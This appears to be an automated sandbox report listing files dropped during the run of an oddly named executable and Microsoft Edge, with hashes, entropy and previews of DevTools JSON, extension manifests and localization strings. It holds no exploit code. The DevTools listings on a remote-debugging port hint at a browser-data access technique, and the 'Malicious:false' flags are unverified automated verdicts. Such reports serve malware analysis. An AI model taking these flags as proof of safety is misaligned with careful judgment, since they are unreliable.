                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3500
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.402448286281946
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:6NnCqHCqNnCUbCXNnCc9CLNnCFdgEC2NnC8C9NnC8vDC8+NnCIOMTwCIJNnCI2jK:6NpNONuN2FNSN7GNLhmJNb
                                                                                                                                                                                                                                                                                    MD5:C4229390E4A221A78CFD07DABCF56794
                                                                                                                                                                                                                                                                                    SHA1:F316C25E45C9883821843918D44883B3A1141DE0
                                                                                                                                                                                                                                                                                    SHA-256:28A27028A223229C736D8BDD21506FFEDF62871E8A2A7161970EBADAA946E9BF
                                                                                                                                                                                                                                                                                    SHA-512:522FF36B9E4502522A2D4285B27574001FC8E6EF44DE6BAD3F844D50D6D288E85DBA5095DEB9C5F9799923ECF626F3511D5A2B10BBB1C82BFAC62FECBC7AE4D7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/4B700256B07BDC9CE1E45981E8D92E8D",.. "id": "4B700256B07BDC9CE1E45981E8D92E8D",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/4B700256B07BDC9CE1E45981E8D92E8D"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/04EEB3F7C10103BDD5433D3D997670FB",.. "id": "04EEB3F7C10103BDD5433D3D997670FB",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/04EEB3F7C10103BDD5433D3D997670FB"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1787
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.374676127771131
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:SfNaoCFTECOfNaoCPV0VFCPVIfNaoCxCNfNaoCT0UrU0U8CN:6NnCFTEC2NnCMCyNnCxC5NnCT0UrU0Ub
                                                                                                                                                                                                                                                                                    MD5:BA106FD279C557FC580F05419B36E942
                                                                                                                                                                                                                                                                                    SHA1:6DBA3B78E4B64A9F388A177236DED360A5125B19
                                                                                                                                                                                                                                                                                    SHA-256:7E6DB349369EBCC83EB3D977574990536141E3002E97FF61CBEC869676F8C824
                                                                                                                                                                                                                                                                                    SHA-512:8EE45F3244E7CD5812E23096FBC775B80B4E11385210F359898FC59AA588E7F739CFA80F83B1F46FD58EDBE7BECB6259316D12CDE0ADDDDA48079987D4CAC6AE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/3E20396B92BCB16156AC61F50E4BD9F6",.. "id": "3E20396B92BCB16156AC61F50E4BD9F6",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/3E20396B92BCB16156AC61F50E4BD9F6"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/D4CFC2FB6A7E4EBD6594F014A53D8274",.. "id": "D4CFC2FB6A7E4EBD6594F014A53D8274",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/D4CFC2FB6A7E4EBD6594F014A53D8274"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):154477
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                    MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                    SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                    SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                    SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41900
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):76321
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.996057445951542
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6wpGzxue:GdS8scZNzFrMa4M+lK5/nXexue
                                                                                                                                                                                                                                                                                    MD5:D7A1AC56ED4F4D17DD0524C88892C56D
                                                                                                                                                                                                                                                                                    SHA1:4153CA1A9A4FD0F781ECD5BA9D2A1E68C760ECD4
                                                                                                                                                                                                                                                                                    SHA-256:0A29576C4002D863B0C5AE7A0B36C0BBEB0FB9AFD16B008451D4142C07E1FF2B
                                                                                                                                                                                                                                                                                    SHA-512:31503F2F6831070E887EA104296E17EE755BB6BBFB1EF2A15371534BFA2D3F0CD53862389625CF498754B071885A53E1A7F82A3546275DB1F4588E0E80BF7BEE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):206855
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                                                    MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                                                    SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                                                    SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                                                    SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2110
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4112007134435585
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rri:8e2Fa116uCntc5toY5Zb5M
                                                                                                                                                                                                                                                                                    MD5:D0B70EFDE8DC66EA180E8EC44C4AB144
                                                                                                                                                                                                                                                                                    SHA1:234B56CF0388DE19C8D17CA5DA99D04DDC1C9574
                                                                                                                                                                                                                                                                                    SHA-256:2A8A15DFFFCD7407B3089297460073A8D7438284F93C55E267FDCD2A5905C153
                                                                                                                                                                                                                                                                                    SHA-512:13F270DA247D372FE65C6411F5D6BC432D84D9852AB08D1E28EC979BA75B7AC4082BE2A4B2746EA3964D30EA7AF8364B99A99BA58851101B1D7FFBB7AED6323F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1539024
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.991225831646159
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:24576:sVFxetPJnORAIBx6LpI9brLetNBIDp1E6q5YhzV1xjM8472skMnD6gzzLYG:szQlIBY6ZfOBIDp1/qG9/4hkMn5B
                                                                                                                                                                                                                                                                                    MD5:05C709C14B33D181E0578BE01E2271F8
                                                                                                                                                                                                                                                                                    SHA1:CBB91AB80CC88BCFB0A0F63F2AF2547A2F27612F
                                                                                                                                                                                                                                                                                    SHA-256:84A55D8DFA4709D9C6C69CC44804831610C1471642D1E4E7C29E03D6960BC794
                                                                                                                                                                                                                                                                                    SHA-512:9FACD0D9A1F638BCB6A1104038FFFA8711597C904810D3D05DB32CCD73E09D8C9037B0888E4C3432A592A0CC709CDB3C89F85668B981F927C5D8F246C79682F5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):11185
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                    MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                    SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                    SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                    SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1753
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                    MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                    SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                    SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                    SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "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",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9815
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                    MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                    SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                    SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                    SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):10388
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                    MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                    SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                    SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                    SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):962
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                    MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                    SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                    SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                    SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):11185
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                    MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                    SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                    SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                    SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):154477
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                    MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                    SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                    SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                    SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4982
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                    MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                    SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                    SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                    SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):908
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                    MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                    SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                    SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                    SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1285
